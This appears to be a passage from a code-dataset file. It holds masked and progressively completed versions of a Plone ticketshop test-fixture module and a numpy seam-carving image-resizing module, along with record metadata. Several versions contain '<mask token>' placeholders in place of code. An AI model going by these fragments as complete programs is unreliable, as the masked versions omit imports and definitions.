"step-3": "<mask token>\n\n\ndef set_browserlayer(request):\n \"\"\"Set the BrowserLayer for the request.\n\n We have to set the browserlayer manually, since importing the profile alone\n doesn't do it in tests.\n \"\"\"\n alsoProvides(request, ITicketShopExtensionLayer)\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\n<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-4": "<mask token>\nif getFSVersionTuple()[0] >= 5:\n PLONE5 = 1\nelse:\n PLONE5 = 0\n\n\ndef set_browserlayer(request):\n \"\"\"Set the BrowserLayer for the request.\n\n We have to set the browserlayer manually, since importing the profile alone\n doesn't do it in tests.\n \"\"\"\n alsoProvides(request, ITicketShopExtensionLayer)\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\n<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-5": "from Products.CMFPlone.utils import getFSVersionTuple\nfrom bda.plone.ticketshop.interfaces import ITicketShopExtensionLayer\nfrom plone.app.robotframework.testing import MOCK_MAILHOST_FIXTURE\nfrom plone.app.testing import FunctionalTesting\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.app.testing import TEST_USER_ID\nfrom plone.app.testing import setRoles\nfrom plone.testing import z2\nfrom zope.interface import alsoProvides\nimport plone.api\n\nif getFSVersionTuple()[0] >= 5:\n PLONE5 = 1\nelse:\n PLONE5 = 0\n\n\ndef set_browserlayer(request):\n \"\"\"Set the BrowserLayer for the request.\n\n We have to set the browserlayer manually, since importing the profile alone\n doesn't do it in tests.\n \"\"\"\n alsoProvides(request, ITicketShopExtensionLayer)\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop,\n context=configurationContext)\n\n # Install products that use an old-style initialize() function\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n # Uninstall old-style Products\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\nTicketshop_FIXTURE = TicketshopLayer()\nTicketshop_INTEGRATION_TESTING = IntegrationTesting(\n bases=(Ticketshop_FIXTURE,),\n name=\"Ticketshop:Integration\")\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n # don't use shop fixture here. looks like, test layers use differen ZODB\n # connections and c.z.datagriedfield fails with a ZODB object reference\n # error.\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes,\n context=configurationContext)\n\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop,\n context=configurationContext)\n\n # Install products that use an old-style initialize() function\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n\n portal.portal_workflow.setDefaultChain(\"one_state_workflow\")\n setRoles(portal, TEST_USER_ID, ['Manager'])\n\n # Create test users\n cru = plone.api.user.create\n cru(email=\"[email protected]\", username=\"customer1\", password=\"customer1\")\n cru(email=\"[email protected]\", username=\"customer2\", password=\"customer2\")\n cru(email=\"[email protected]\", username=\"vendor1\", password=\"vendor1\")\n cru(email=\"[email protected]\", username=\"vendor2\", password=\"vendor2\")\n\n # Create test content\n crc = plone.api.content.create\n\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title=\"item_11\")\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title=\"item_12\")\n\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title=\"item_21\")\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title=\"item_22\")\n\n\nTicketshopAT_FIXTURE 
= TicketshopATLayer()\nTicketshopAT_INTEGRATION_TESTING = IntegrationTesting(\n bases=(TicketshopAT_FIXTURE,),\n name=\"TicketshopAT:Integration\")\nTicketshopAT_ROBOT_TESTING = FunctionalTesting(\n bases=(\n MOCK_MAILHOST_FIXTURE,\n TicketshopAT_FIXTURE,\n z2.ZSERVER_FIXTURE\n ),\n name=\"TicketshopAT:Robot\")\n",
"step-ids": [
4,
7,
10,
11,
14
]
}
|
[
4,
7,
10,
11,
14
] |
import numpy as np
def get_mask(mask):
    r = mask[:, :, 0]
    g = mask[:, :, 1]
    return r // (r.max() or 1) * -1 + g // (g.max() or 1)


def calculate_brightness(image):
    weights = np.array([0.299, 0.587, 0.114])
    brightness_matrix = (image * weights).sum(axis=2)
    return brightness_matrix


def calculate_energy(brightness):
    x_gradient = np.hstack((
        (brightness[:, 1] - brightness[:, 0])[:, np.newaxis],
        brightness[:, 2:] - brightness[:, :-2],
        (brightness[:, -1] - brightness[:, -2])[:, np.newaxis]
    ))
    y_gradient = np.vstack((
        brightness[1, :] - brightness[0, :],
        brightness[2:, :] - brightness[:-2, :],
        brightness[-1, :] - brightness[-2, :]
    ))
    return np.sqrt(x_gradient ** 2 + y_gradient ** 2)


def calculate_minimal_seam_matrix(pre_energy, mask=None):
    min_seam_searcher = pre_energy + mask if mask is not None else pre_energy.copy()
    for i in range(1, min_seam_searcher.shape[0]):
        row = min_seam_searcher[i - 1]
        minimum = np.vstack((np.insert(row[:-1], 0, row[0]), row, np.append(row[1:], row[-1]))).min(axis=0)
        min_seam_searcher[i] += minimum
    return min_seam_searcher


def get_minimal_seam(min_seam):
    seam = np.zeros(min_seam.shape[0], dtype=np.int32)
    seam[-1] = np.argmin(min_seam[-1])
    for i in range(min_seam.shape[0] - 2, -1, -1):
        last = seam[i + 1]
        if last == 0:
            seam[i] = np.argmin(min_seam[i, :2])
        elif last == min_seam.shape[1] - 1:
            seam[i] = last + np.argmin(min_seam[i, (last - 1):]) - 1
        else:
            seam[i] = last + np.argmin(min_seam[i, (last - 1):(last + 2)]) - 1
    return seam
def cut(image, mask):
    brightness = calculate_brightness(image)
    energy = calculate_energy(brightness)
    mult = image.shape[0] * image.shape[1] * 256
    min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not None else None)
    seam = get_minimal_seam(min_seam)
    copy = np.empty((image.shape[0], image.shape[1] - 1, 3), np.uint8)
    copy_mask = np.empty((image.shape[0], image.shape[1] - 1), np.int32) if mask is not None else None
    seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)
    for row, i in enumerate(seam):
        copy[row] = np.delete(image[row], i, axis=0)
        if mask is not None:
            copy_mask[row] = np.delete(mask[row], i, axis=0)
        seam_mask[row][i] = 1
    return copy, copy_mask, seam_mask


def extend(image, mask):
    brightness = calculate_brightness(image)
    energy = calculate_energy(brightness)
    mult = image.shape[0] * image.shape[1] * 256
    min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not None else None)
    seam = get_minimal_seam(min_seam)
    copy = np.empty((image.shape[0], image.shape[1] + 1, 3), np.uint8)
    copy_mask = np.zeros((image.shape[0], image.shape[1] + 1), np.int32) if mask is not None else None
    seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)
    for row, i in enumerate(seam):
        if i >= image.shape[1] - 1:
            copy[row] = np.concatenate((image[row], [image[row][-1]]), axis=0)
            if mask is not None:
                copy_mask[row] = np.append(mask[row], 0)
                copy_mask[row][-2] = 1
                copy_mask[row][-1] = 1
        else:
            copy[row] = np.insert(image[row], i + 1, image[row][i] // 2 + image[row][i + 1] // 2, axis=0)
            if mask is not None:
                copy_mask[row] = np.insert(mask[row], i + 1, 0, axis=0)
                copy_mask[row][i] = 1
                copy_mask[row][i + 1] = 1
        seam_mask[row][i] = 1
    return copy, copy_mask, seam_mask
def seam_carve(image, mode, mask):
    if mode == 'horizontal shrink':
        return cut(image, mask)
    elif mode == 'vertical shrink':
        transposed_image, transposed_mask, transposed_seam_mask = cut(
            np.transpose(image, (1, 0, 2)), mask.T if mask is not None else None
        )
        return (np.transpose(transposed_image, (1, 0, 2)),
                transposed_mask.T if mask is not None else None,
                transposed_seam_mask.T)
    elif mode == 'horizontal expand':
        return extend(image, mask)
    else:
        transposed_image, transposed_mask, transposed_seam_mask = extend(
            np.transpose(image, (1, 0, 2)), mask.T if mask is not None else None
        )
        return (np.transpose(transposed_image, (1, 0, 2)),
                transposed_mask.T if mask is not None else None,
                transposed_seam_mask.T)
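

# Hedged usage sketch (added; not part of the original module). Loading via
# PIL and the file names below are assumptions made for illustration only.
if __name__ == '__main__':
    from PIL import Image

    img = np.array(Image.open('example.jpg'))  # hypothetical input image
    mask = None  # or: get_mask(np.array(Image.open('mask.png')))
    for _ in range(50):  # remove 50 vertical seams -> image gets 50 px narrower
        img, mask, _seam = seam_carve(img, 'horizontal shrink', mask)
    Image.fromarray(img).save('example_shrunk.jpg')  # hypothetical output path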
|
normal
|
{
"blob_id": "7130a382784955780a3f258c81ce05c61915af56",
"index": 5000,
"step-1": "<mask token>\n\n\ndef get_mask(mask):\n r = mask[:, :, 0]\n g = mask[:, :, 1]\n return r // (r.max() or 1) * -1 + g // (g.max() or 1)\n\n\n<mask token>\n\n\ndef extend(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] + 1, 3), np.uint8)\n copy_mask = np.zeros((image.shape[0], image.shape[1] + 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n if i >= image.shape[1] - 1:\n copy[row] = np.concatenate((image[row], [image[row][-1]]), axis=0)\n if mask is not None:\n copy_mask[row] = np.append(mask[row], 0)\n copy_mask[row][-2] = 1\n copy_mask[row][-1] = 1\n else:\n copy[row] = np.insert(image[row], i + 1, image[row][i] // 2 + \n image[row][i + 1] // 2, axis=0)\n if mask is not None:\n copy_mask[row] = np.insert(mask[row], i + 1, 0, axis=0)\n copy_mask[row][i] = 1\n copy_mask[row][i + 1] = 1\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef seam_carve(image, mode, mask):\n if mode == 'horizontal shrink':\n return cut(image, mask)\n elif mode == 'vertical shrink':\n transposed_image, transposed_mask, transposed_seam_mask = cut(np.\n transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n elif mode == 'horizontal expand':\n return extend(image, mask)\n else:\n transposed_image, transposed_mask, transposed_seam_mask = extend(np\n .transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n",
"step-2": "<mask token>\n\n\ndef get_mask(mask):\n r = mask[:, :, 0]\n g = mask[:, :, 1]\n return r // (r.max() or 1) * -1 + g // (g.max() or 1)\n\n\ndef calculate_brightness(image):\n weights = np.array([0.299, 0.587, 0.114])\n brightness_matrix = (image * weights).sum(axis=2)\n return brightness_matrix\n\n\ndef calculate_energy(brightness):\n x_gradient = np.hstack(((brightness[:, 1] - brightness[:, 0])[:, np.\n newaxis], brightness[:, 2:] - brightness[:, :-2], (brightness[:, -1\n ] - brightness[:, -2])[:, np.newaxis]))\n y_gradient = np.vstack((brightness[1, :] - brightness[0, :], brightness\n [2:, :] - brightness[:-2, :], brightness[-1, :] - brightness[-2, :]))\n return np.sqrt(x_gradient ** 2 + y_gradient ** 2)\n\n\n<mask token>\n\n\ndef cut(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] - 1, 3), np.uint8)\n copy_mask = np.empty((image.shape[0], image.shape[1] - 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n copy[row] = np.delete(image[row], i, axis=0)\n if mask is not None:\n copy_mask[row] = np.delete(mask[row], i, axis=0)\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef extend(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] + 1, 3), np.uint8)\n copy_mask = np.zeros((image.shape[0], image.shape[1] + 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n if i >= image.shape[1] - 1:\n copy[row] = np.concatenate((image[row], [image[row][-1]]), axis=0)\n if mask is not None:\n copy_mask[row] = np.append(mask[row], 0)\n copy_mask[row][-2] = 1\n copy_mask[row][-1] = 1\n else:\n copy[row] = np.insert(image[row], i + 1, image[row][i] // 2 + \n image[row][i + 1] // 2, axis=0)\n if mask is not None:\n copy_mask[row] = np.insert(mask[row], i + 1, 0, axis=0)\n copy_mask[row][i] = 1\n copy_mask[row][i + 1] = 1\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef seam_carve(image, mode, mask):\n if mode == 'horizontal shrink':\n return cut(image, mask)\n elif mode == 'vertical shrink':\n transposed_image, transposed_mask, transposed_seam_mask = cut(np.\n transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n elif mode == 'horizontal expand':\n return extend(image, mask)\n else:\n transposed_image, transposed_mask, transposed_seam_mask = extend(np\n .transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n",
"step-3": "<mask token>\n\n\ndef get_mask(mask):\n r = mask[:, :, 0]\n g = mask[:, :, 1]\n return r // (r.max() or 1) * -1 + g // (g.max() or 1)\n\n\ndef calculate_brightness(image):\n weights = np.array([0.299, 0.587, 0.114])\n brightness_matrix = (image * weights).sum(axis=2)\n return brightness_matrix\n\n\ndef calculate_energy(brightness):\n x_gradient = np.hstack(((brightness[:, 1] - brightness[:, 0])[:, np.\n newaxis], brightness[:, 2:] - brightness[:, :-2], (brightness[:, -1\n ] - brightness[:, -2])[:, np.newaxis]))\n y_gradient = np.vstack((brightness[1, :] - brightness[0, :], brightness\n [2:, :] - brightness[:-2, :], brightness[-1, :] - brightness[-2, :]))\n return np.sqrt(x_gradient ** 2 + y_gradient ** 2)\n\n\ndef calculate_minimal_seam_matrix(pre_energy, mask=None):\n min_seam_searcher = (pre_energy + mask if mask is not None else\n pre_energy.copy())\n for i in range(1, min_seam_searcher.shape[0]):\n row = min_seam_searcher[i - 1]\n minimum = np.vstack((np.insert(row[:-1], 0, row[0]), row, np.append\n (row[1:], row[-1]))).min(axis=0)\n min_seam_searcher[i] += minimum\n return min_seam_searcher\n\n\n<mask token>\n\n\ndef cut(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] - 1, 3), np.uint8)\n copy_mask = np.empty((image.shape[0], image.shape[1] - 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n copy[row] = np.delete(image[row], i, axis=0)\n if mask is not None:\n copy_mask[row] = np.delete(mask[row], i, axis=0)\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef extend(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] + 1, 3), np.uint8)\n copy_mask = np.zeros((image.shape[0], image.shape[1] + 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n if i >= image.shape[1] - 1:\n copy[row] = np.concatenate((image[row], [image[row][-1]]), axis=0)\n if mask is not None:\n copy_mask[row] = np.append(mask[row], 0)\n copy_mask[row][-2] = 1\n copy_mask[row][-1] = 1\n else:\n copy[row] = np.insert(image[row], i + 1, image[row][i] // 2 + \n image[row][i + 1] // 2, axis=0)\n if mask is not None:\n copy_mask[row] = np.insert(mask[row], i + 1, 0, axis=0)\n copy_mask[row][i] = 1\n copy_mask[row][i + 1] = 1\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef seam_carve(image, mode, mask):\n if mode == 'horizontal shrink':\n return cut(image, mask)\n elif mode == 'vertical shrink':\n transposed_image, transposed_mask, transposed_seam_mask = cut(np.\n transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n elif mode == 'horizontal expand':\n return extend(image, mask)\n else:\n transposed_image, transposed_mask, transposed_seam_mask = extend(np\n .transpose(image, (1, 0, 2)), mask.T if mask is not None else 
None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n",
"step-4": "import numpy as np\n\n\ndef get_mask(mask):\n r = mask[:, :, 0]\n g = mask[:, :, 1]\n return r // (r.max() or 1) * -1 + g // (g.max() or 1)\n\n\ndef calculate_brightness(image):\n weights = np.array([0.299, 0.587, 0.114])\n brightness_matrix = (image * weights).sum(axis=2)\n return brightness_matrix\n\n\ndef calculate_energy(brightness):\n x_gradient = np.hstack(((brightness[:, 1] - brightness[:, 0])[:, np.\n newaxis], brightness[:, 2:] - brightness[:, :-2], (brightness[:, -1\n ] - brightness[:, -2])[:, np.newaxis]))\n y_gradient = np.vstack((brightness[1, :] - brightness[0, :], brightness\n [2:, :] - brightness[:-2, :], brightness[-1, :] - brightness[-2, :]))\n return np.sqrt(x_gradient ** 2 + y_gradient ** 2)\n\n\ndef calculate_minimal_seam_matrix(pre_energy, mask=None):\n min_seam_searcher = (pre_energy + mask if mask is not None else\n pre_energy.copy())\n for i in range(1, min_seam_searcher.shape[0]):\n row = min_seam_searcher[i - 1]\n minimum = np.vstack((np.insert(row[:-1], 0, row[0]), row, np.append\n (row[1:], row[-1]))).min(axis=0)\n min_seam_searcher[i] += minimum\n return min_seam_searcher\n\n\ndef get_minimal_seam(min_seam):\n seam = np.zeros(min_seam.shape[0], dtype=np.int32)\n seam[-1] = np.argmin(min_seam[-1])\n for i in range(min_seam.shape[0] - 2, -1, -1):\n last = seam[i + 1]\n if last == 0:\n seam[i] = np.argmin(min_seam[i, :2])\n elif last == min_seam.shape[1] - 1:\n seam[i] = last + np.argmin(min_seam[i, last - 1:]) - 1\n else:\n seam[i] = last + np.argmin(min_seam[i, last - 1:last + 2]) - 1\n return seam\n\n\ndef cut(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] - 1, 3), np.uint8)\n copy_mask = np.empty((image.shape[0], image.shape[1] - 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n copy[row] = np.delete(image[row], i, axis=0)\n if mask is not None:\n copy_mask[row] = np.delete(mask[row], i, axis=0)\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef extend(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] + 1, 3), np.uint8)\n copy_mask = np.zeros((image.shape[0], image.shape[1] + 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n if i >= image.shape[1] - 1:\n copy[row] = np.concatenate((image[row], [image[row][-1]]), axis=0)\n if mask is not None:\n copy_mask[row] = np.append(mask[row], 0)\n copy_mask[row][-2] = 1\n copy_mask[row][-1] = 1\n else:\n copy[row] = np.insert(image[row], i + 1, image[row][i] // 2 + \n image[row][i + 1] // 2, axis=0)\n if mask is not None:\n copy_mask[row] = np.insert(mask[row], i + 1, 0, axis=0)\n copy_mask[row][i] = 1\n copy_mask[row][i + 1] = 1\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef seam_carve(image, mode, mask):\n if mode == 'horizontal shrink':\n return cut(image, mask)\n elif mode == 'vertical shrink':\n transposed_image, transposed_mask, 
transposed_seam_mask = cut(np.\n transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n elif mode == 'horizontal expand':\n return extend(image, mask)\n else:\n transposed_image, transposed_mask, transposed_seam_mask = extend(np\n .transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n",
"step-5": "import numpy as np\n\n\ndef get_mask(mask):\n r = mask[:, :, 0]\n g = mask[:, :, 1]\n return r // (r.max() or 1) * -1 + g // (g.max() or 1)\n\n\ndef calculate_brightness(image):\n weights = np.array([0.299, 0.587, 0.114])\n brightness_matrix = (image*weights).sum(axis=2)\n return brightness_matrix\n\n\ndef calculate_energy(brightness):\n x_gradient = np.hstack((\n (brightness[:, 1] - brightness[:, 0])[:, np.newaxis],\n brightness[:, 2:] - brightness[:, :-2],\n (brightness[:, -1] - brightness[:, -2])[:, np.newaxis]\n ))\n y_gradient = np.vstack((\n brightness[1, :] - brightness[0, :],\n brightness[2:, :] - brightness[:-2, :],\n brightness[-1, :] - brightness[-2, :]\n ))\n return np.sqrt(x_gradient ** 2 + y_gradient ** 2)\n\n\ndef calculate_minimal_seam_matrix(pre_energy, mask=None):\n min_seam_searcher = pre_energy + mask if mask is not None else pre_energy.copy()\n for i in range(1, min_seam_searcher.shape[0]):\n row = min_seam_searcher[i-1]\n minimum = np.vstack((np.insert(row[:-1], 0, row[0]), row, np.append(row[1:], row[-1]))).min(axis=0)\n min_seam_searcher[i] += minimum\n return min_seam_searcher\n\n\ndef get_minimal_seam(min_seam):\n seam = np.zeros(min_seam.shape[0], dtype=np.int32)\n seam[-1] = np.argmin(min_seam[-1])\n for i in range(min_seam.shape[0] - 2, -1, -1):\n last = seam[i+1]\n if last == 0:\n seam[i] = np.argmin(min_seam[i, : 2])\n elif last == min_seam.shape[1] - 1:\n seam[i] = last + np.argmin(min_seam[i, (last - 1):]) - 1\n else:\n seam[i] = last + np.argmin(min_seam[i, (last - 1): (last + 2)]) - 1\n return seam\n\n\ndef cut(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] - 1, 3), np.uint8)\n copy_mask = np.empty((image.shape[0], image.shape[1] - 1), np.int32) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n copy[row] = np.delete(image[row], i, axis=0)\n if mask is not None:\n copy_mask[row] = np.delete(mask[row], i, axis=0)\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef extend(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] + 1, 3), np.uint8)\n copy_mask = np.zeros((image.shape[0], image.shape[1] + 1), np.int32) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n if i >= image.shape[1] - 1:\n copy[row] = np.concatenate((image[row], [image[row][-1]]), axis=0)\n if mask is not None:\n copy_mask[row] = np.append(mask[row], 0)\n copy_mask[row][-2] = 1\n copy_mask[row][-1] = 1\n else:\n copy[row] = np.insert(image[row], i+1, image[row][i] // 2 + image[row][i+1] // 2, axis=0)\n if mask is not None:\n copy_mask[row] = np.insert(mask[row], i+1, 0, axis=0)\n copy_mask[row][i] = 1\n copy_mask[row][i+1] = 1\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef seam_carve(image, mode, mask):\n if mode == 'horizontal shrink':\n return cut(image, mask)\n elif mode == 'vertical shrink':\n transposed_image, transposed_mask, transposed_seam_mask = cut(\n 
np.transpose(image, (1, 0, 2)), mask.T if mask is not None else None\n )\n return (np.transpose(transposed_image, (1, 0, 2)),\n transposed_mask.T if mask is not None else None,\n transposed_seam_mask.T)\n elif mode == 'horizontal expand':\n return extend(image, mask)\n else:\n transposed_image, transposed_mask, transposed_seam_mask = extend(\n np.transpose(image, (1, 0, 2)), mask.T if mask is not None else None\n )\n return (np.transpose(transposed_image, (1, 0, 2)),\n transposed_mask.T if mask is not None else None,\n transposed_seam_mask.T)\n",
"step-ids": [
3,
6,
7,
9,
10
]
}
|
